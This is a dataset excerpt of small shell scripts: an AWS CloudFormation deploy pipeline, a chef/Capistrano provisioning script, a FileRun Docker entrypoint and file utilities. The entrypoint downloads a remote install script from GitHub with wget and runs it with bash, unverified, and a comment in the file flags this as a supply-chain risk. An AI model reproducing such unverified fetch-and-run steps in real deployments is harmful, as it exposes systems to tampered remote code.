stelligent/blog_refactor_nodejs
|
/pipelines/deploy.sh
|
UTF-8
| 2,367
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Deploys the refactored NodeJS demo app:
#   1. clone the source, 2. lint it (foodcritic + jslint),
#   3. create the app's CloudFormation ASG stack, 4. smoke-test the ELB.
# (The original first line was "#bin/bash" -- missing "!" -- so it was a
# comment, not a shebang.)

# these environment variables should be in the script executor's profile
export AWS_REGION="us-east-1"
export AWS_VPC_ID="vpc-857a3ee2"
export AWS_SUBNET_IDS="subnet-c5a76a8c,subnet-3b233a06"
export AWS_AZS="us-east-1c,us-east-1b"
export AWS_KEYPAIR="dugas-labs"

# set up local variables
app_name=NodeJSApp
repository_url=https://github.com/stelligent/blog_refactor_nodejs
repository_branch=master
aws_region=${AWS_REGION:-us-east-1}
aws_vpc=${AWS_VPC_ID}
aws_subnets=${AWS_SUBNET_IDS}
aws_azs=${AWS_AZS}
aws_keypair=${AWS_KEYPAIR}

# fetch source code:
rm -rf .working-folder
git clone --branch "${repository_branch}" --depth 1 "${repository_url}" .working-folder

# perform static analysis on the code
pushd ./.working-folder || exit 1
foodcritic -t ~FC001 "pipelines/cookbooks/${app_name}" -P
find . -name "*.js" -print0 | xargs -0 jslint
popd || exit 1

# create a timestamp for naming the application's CloudFormation stack
stamp=$(date +%Y%m%d%H%M%s)

# run aws cli for cloudformation of ASG
asg_stack_name="${app_name}-${stamp}"
cfn_template=${DEPLOY_TEMPLATE:-./cfn/deploy-app.template}
aws cloudformation create-stack \
  --disable-rollback \
  --region "${aws_region}" \
  --stack-name "${asg_stack_name}" \
  --template-body "file://${cfn_template}" \
  --capabilities CAPABILITY_IAM \
  --tags \
    Key="application",Value="${app_name}" \
    Key="branch",Value="${repository_branch}" \
  --parameters \
    ParameterKey=VpcId,ParameterValue="${aws_vpc}" \
    ParameterKey=AWSKeyPair,ParameterValue="${aws_keypair}" \
    ParameterKey=ASGSubnetIds,ParameterValue=\"${aws_subnets}\" \
    ParameterKey=ASGAvailabilityZones,ParameterValue=\"${aws_azs}\" \
    ParameterKey=AppName,ParameterValue=blog_refactor_nodejs \
    ParameterKey=PropertyStr,ParameterValue="${PropertyStr:-banjo}" \
    ParameterKey=PropertyNum,ParameterValue="${PropertyNum:-144}" \
    ParameterKey=PropertyBool,ParameterValue="${PropertyBool:-true}" \
    ParameterKey=PropertyUrl,ParameterValue="${PropertyUrl:-https://jqplay.org/}"

aws cloudformation wait stack-create-complete --stack-name "${asg_stack_name}"

# Bug fixes vs. the original tail:
#  - describe-stacks queried the undefined ${rds_stack_name}; use ${asg_stack_name}
#  - jq needs -r so the DNS name is not wrapped in JSON quotes
#  - "https://%{elb_dns}" used invalid %{...} syntax, and curl was handed the
#    literal string "elb_url" (missing $)
aws cloudformation describe-stacks --stack-name "${asg_stack_name}" 2>/dev/null > .working-folder/app.tmp
elb_dns=$(jq -r '.Stacks[0].Outputs[] | select(.OutputKey == "DNSName") | .OutputValue' < .working-folder/app.tmp)
elb_url="https://${elb_dns}"

# post-deploy smoke test
curl "$elb_url"
| true
|
4e97e7763b083328c5e789bd006d5e3ad2b67c15
|
Shell
|
anshulm/knife_solo-experiments
|
/config/pull_the_trigger.sh
|
UTF-8
| 626
| 3.484375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Provisions a target host with chef-solo and deploys the app via Capistrano.
#
# Usage: pull_the_trigger.sh <user> <ip> <port>

# check for correct number of arguments
if [ $# -ne 3 ]; then
  echo "Usage: $0 <user> <ip> <port>"
  exit 1
fi

# set variables
# (renamed from USER: USER is typically exported by login shells, so
# assigning to it leaked the deploy user into the environment of the
# ssh/knife/cap child processes below)
DEPLOY_USER=$1
IP=$2
PORT=$3

# upload key for the vagrant user - need to have a root user. Check EC2 specific changes
ssh-copy-id -i ~/.ssh/id_rsa.pub -p "$PORT" "vagrant@$IP"

# install chef
#cd chef && knife solo prepare -p $PORT vagrant@$IP
# Guard the cd: without it, knife would run against the wrong directory.
cd chef || exit 1

# execute the run list
knife solo cook -p "$PORT" "vagrant@$IP"

# upload key for user
ssh-copy-id -i ~/.ssh/id_rsa.pub -p "$PORT" "$DEPLOY_USER@$IP"

# upload app
cd ../.. || exit 1
cap production deploy

# restart nginx
ssh -p "$PORT" -t "$DEPLOY_USER@$IP" 'sudo service nginx restart'
| true
|
aa1d0b11077208a86228e74c3b82967cbab23156
|
Shell
|
igorper/med-seq-explorer
|
/compres.sh
|
UTF-8
| 684
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
# Collects the part-00000 output of every matching results folder into a
# temporary directory, zips them as results.zip in the invoking directory,
# and removes the temporary directory again.
#
# Usage: compres.sh [-i <input_glob>]

# Default input pattern; kept unexpanded here and globbed in the loop below.
input_folder="/scratch/users/pernek/results/search_tseq_nint_*/"
tmp_folder="/scratch/users/pernek/results/tmp/"

while getopts ":i:" opt; do
  case $opt in
    i)
      input_folder=$OPTARG
      ;;
    \?)
      echo "Invalid option: -$OPTARG" >&2
      exit 1
      ;;
    :)
      echo "Option -$OPTARG requires an argument." >&2
      exit 1
      ;;
  esac
done

echo "Compressing folder $input_folder"
mkdir -p "$tmp_folder" || exit 1

# $input_folder is expanded unquoted on purpose so the glob matches every
# result directory. NOTE(review): assumes each match ends with '/' (the
# default pattern does) so "${d}part-00000" forms a valid path -- confirm
# when passing -i.
for d in $input_folder; do
  filename=$(basename "$d")
  echo "$filename"
  cp "${d}part-00000" "$tmp_folder$filename"
done

cur_folder=$(pwd)
echo "$cur_folder"
# Guard the cd: zipping from the wrong directory would package random files.
cd "$tmp_folder" || exit 1
zip -r "results.zip" .
mv "results.zip" "$cur_folder"
# Leave the directory before deleting it -- the original removed its own
# current working directory.
cd "$cur_folder" || exit 1
rm -r "$tmp_folder"
| true
|
c490e861858429086aa6a1f922cdaebbe1776c1b
|
Shell
|
yuliujuan/docker-pan
|
/entrypoint.sh
|
UTF-8
| 753
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/bash
# Docker entrypoint: performs one-time FileRun setup on the first container
# start, then execs the container's main command (CMD).
set -eux
# index.php missing => fresh container; unpack and configure FileRun.
if [ ! -e /var/www/html/index.php ]; then
echo "[FileRun fresh install]"
unzip /filerun.zip -d /var/www/html/
cp /autoconfig.php /var/www/html/system/data/
mkdir -p /user-files/superuser/dl
#wget https://gist.githubusercontent.com/jae-jae/9b09a9bf90b733aed896713f56c8a1f2/raw/install-aria2-ui.sh
# NOTE(review): downloads and executes a remote script with no checksum or
# signature verification -- supply-chain risk.
wget https://raw.githubusercontent.com/yuliujuan/files/master/install-aria2-ui.sh
bash install-aria2-ui.sh
# rm -R /var/www/html/dl/files
# ln -s /user-files/superuser/dl /var/www/html/dl/files
# Web server must own both the app tree and the user storage.
chown -R www-data:www-data /var/www/html
chown -R www-data:www-data /user-files
# Wait for the MySQL container (up to 120s), then load the schema.
/wait-for-it.sh db:3306 -t 120 -- /import-db.sh
fi
# Hand control to CMD as PID 1.
exec "$@"
| true
|
61d76d988afbdc6f1a5161f7d6c7dab9f6fb0ebf
|
Shell
|
leblanck/macOS-Scripts
|
/ExtensionAttributes/AccountinOSXMail.sh
|
UTF-8
| 382
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# Jamf extension attribute: reports whether the last logged-in user has any
# account data in macOS Mail (~/Library/Mail is non-empty).

# Prints the EA <result> line for the given directory listing.
mail_result() {
  # The original compared the *string length* of the listing against 1, which
  # would miss a listing consisting of a single character; any non-empty
  # listing means Mail has data.
  if [[ -n $1 ]]; then
    echo "<result>Account Enabled in macOS Mail</result>"
  else
    echo "<result>No Account found in macOS Mail</result>"
  fi
}

#Get Logged in Users
userName=$(defaults read /Library/Preferences/com.apple.loginwindow.plist lastUserName)
echo "$userName"

# Quoted so usernames containing spaces don't break the path; suppress the
# error when the Mail directory does not exist.
mailContents=$(ls "/Users/$userName/Library/Mail" 2>/dev/null)
echo "$mailContents"

mail_result "$mailContents"
| true
|
5a185c87f2960640701cd864da5468ca3e67a53f
|
Shell
|
ZavalichiR/Backup
|
/SO/Teste/Test 1/4/createfis.sh
|
UTF-8
| 600
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# Creates directory $1 and, inside it, an empty file for each remaining
# argument. Accepts 1 to 9 arguments (directory name + up to 8 file names).

# Returns 0 if $1 is a directory, 1 if it is a regular file, 2 otherwise.
verificare() {
  if [[ -d $1 ]]; then
    return 0
  elif [[ -f $1 ]]; then
    return 1
  else
    return 2
  fi
}

main() {
  # NOTE: the original used [[ $# < '1' || $# > '9' ]], which compares
  # *strings* lexically inside [[ ]] -- e.g. 10 arguments slipped through
  # because "10" sorts before "9". Use the arithmetic -lt/-gt operators.
  if [[ $# -lt 1 || $# -gt 9 ]]; then
    echo "Numarul argumentelor este gresit"
    return 0
  fi
  ls
  verificare "$1"
  local rez=$?
  echo "$rez"
  if [[ $rez -eq 0 ]]; then
    echo " Exista deja un director cu acest nume "
    return 0
  elif [[ $rez -eq 1 ]]; then
    echo "Exista deja un fisier cu acest nume"
    return 0
  fi
  mkdir "$1"
  cd "$1" || return 1
  local parametru
  for parametru in "$@"; do   # "$@" keeps arguments containing spaces intact
    # skip the directory's own name so no file is created for it
    if [[ $parametru == "$1" ]]; then
      continue
    fi
    touch "$parametru"
  done
}

main "$@"
| true
|
03dc5ec64700fe9c67a778638dfb8e8973adad93
|
Shell
|
miloooooz/Data-Structure-and-Algorithms
|
/Solvability of the NxN sliding tile puzzle/test.sh
|
UTF-8
| 791
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/sh
# Runs the puzzle program against a group of testcases and appends the
# output of each run to Tests/result.log.
#
# Usage: test.sh [1|2|3|4]
#   1: bad input   2: solvable   3: unsolvable   4: all testfiles

PROG=./puzzle   # running program
DIR=Tests       # directory of testcases

# The original printed this twice (elif/else) via echo "...\n...", whose
# backslash handling is shell-dependent; printf is portable.
usage() {
  printf 'Usage:\n %s [1|2|3|4]\nCommands:\n 1: bad input\n 2: sol input\n 3: unsol input\n 4: all testfiles\n' "$0"
}

main() {
  case "${1-}" in
    "1") T=$DIR/bad* ;;
    "2") T=$DIR/sol* ;;
    "3") T=$DIR/unsol* ;;
    "4") T=$DIR/* ;;
    *)   T= ;;
  esac

  # The original tested `[ A$T != A ]`, where the unquoted A$T globbed at
  # test time and broke with multiple matches, and `elif [ ! $T]` was
  # missing a space before ']'.
  if [ -n "$T" ]; then
    # $T is deliberately left unquoted so the glob expands to the testfiles.
    for i in $T; do
      echo ================= "$i" ================== | tee -a "$DIR/result.log"
      # Print each result to the terminal and append it to the log file.
      # (The original `result= $PROG < $i | tee ...` only set an empty
      # variable in the program's environment instead of capturing output.)
      "$PROG" < "$i" | tee -a "$DIR/result.log"
    done
  else
    usage
  fi
}

main "$@"
| true
|
9a5b9bf93268801d8f6c4967430bf244fd3cd328
|
Shell
|
Daviddddl/ssm-demo
|
/src/main/webapp/data/see.sh
|
UTF-8
| 105
| 2.6875
| 3
|
[] |
no_license
|
# Renames JSON shards _<i>.json so the numbering is shifted down by a fixed
# offset (originally _51.json.._73.json -> _17.json.._39.json).
#
# Usage: see.sh [start] [end] [offset]   (defaults: 51 73 34)
# The previously hard-coded bounds are now parameters with identical
# defaults, so calling with no arguments behaves exactly as before.
main() {
  local start=${1:-51}
  local end=${2:-73}
  local offset=${3:-34}
  local i j
  for (( i = start; i <= end; i++ )); do
    j=$(( i - offset ))   # replaces the parallel i,j counters of the original
    echo "$i $j"
    #head -c 100 _$i.json
    mv "_$i.json" "_$j.json"
  done
}

main "$@"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.